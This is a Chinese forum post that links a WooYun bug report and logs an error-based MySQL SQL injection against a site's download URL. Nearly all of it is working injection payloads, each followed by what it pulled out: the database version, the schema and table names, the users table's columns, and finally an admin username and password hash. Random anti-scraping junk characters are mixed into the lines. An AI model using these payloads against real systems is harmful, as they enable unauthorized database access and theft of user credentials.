http://www.wooyun.org/bugs/wooyun-2010-01666
& P7 t+ j0 \, ^& }5 K: J2 S$ A+ c; o2 }& h, O, Q3 ^0 \
之前想找个测试 没想到这有 可以测试下做个记录而已
. w( S* k% Q1 w) I' G) x
6 l4 B f4 [2 q) b/ ~- qhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
4 o' S6 e' c: L# @' V4 t8 U6 r! T- K' {, G/ S
/data0/htdocs/leqi_new/app/myapp.php4 j; ~" o5 f# V) ~$ M
' C- z3 W# {3 N9 u$ O8 N
或者
3 }! j* ~5 y4 c+ {9 w* H: ]" \: w8 ^9 C; i6 e3 u: r u- B
/**********version()**********/ 5.1.49-log# i$ U6 H& |6 n- Q. G5 U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 q. F; e# X6 M. M8 ?, v
6 g- G9 ^+ D! z+ a3 \" ^" M* L
/**********user()**********/
* ]9 S; r2 h4 m: Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- P: J* S0 M: P. m1 I. `* M& R- v* J+ m2 Y) K6 C2 W! v
/**********database()**********/ leqi* `) l3 V `1 _' B6 X+ }6 x& V; t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. {' [" A2 O! I/ R! Y# U* T9 T* J8 W0 K$ x/ w5 `; q+ R
/**********limit依次递归爆库**********/
4 Z0 U7 f1 H6 @2 w% P+ M3 Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 Y' B1 T- H' Q z
information_schema( p8 O6 t( v4 ^; U+ M6 t$ {. w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 _9 D) Y* o/ f5 e" D% g% U
leqi( P, H" R3 R: G9 s; b, N6 Z7 P d: L
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" a& S' C1 S$ I# M0 F8 H
test( R8 o2 B& h ^' s
4 P, W9 k1 `5 }+ {; B Q6 u
/**********limit依次递归爆表名**********/1 V1 O+ |* e# G0 o, O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 i3 _# r m& Y5 Fusers8 f3 N. \4 n* K9 A. _; X6 l9 E+ b; Q
) A( c N' Z% \. C5 h
/**********limit依次递归爆字段名**********/
( w1 j V& _, y- ~0 m- t: G' ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 x7 c, u+ H8 J& f1 Z) D& W
user_id,username,nickname,passwd,group_id7 P6 r( K. G( p, C4 {8 W1 l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 Z. l' O% j' T1 }8 _7 e
/wapc/5000_0005_003
, U" b) F; l1 l. [6 @11 21
7 N8 f& t+ ]0 _! j1 q+ Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%237 a3 O5 L# [: l" m
/wapc/5000_0005_003
, d* O% q* V6 A9 N0 m+ ^1 B11 341 351 361$ Z0 x* |/ X6 G+ O
/**********爆数据**********/
7 D( z/ c# h3 `7 hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! i. Q3 o. E1 O! ?
admin
/ Y1 S- t2 z& J$ |6 whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%234 Q; I3 N- J+ K P
6a8b4574ca231eb8bd52764d4978ffcd+ |# u* Z2 V/ H& y! E
; J1 E( w; {* ^' ^ c 7 b) P( F9 a& f1 x5 E# b `
|
发表于 2012-9-13 17:52:09
收藏
支持
反对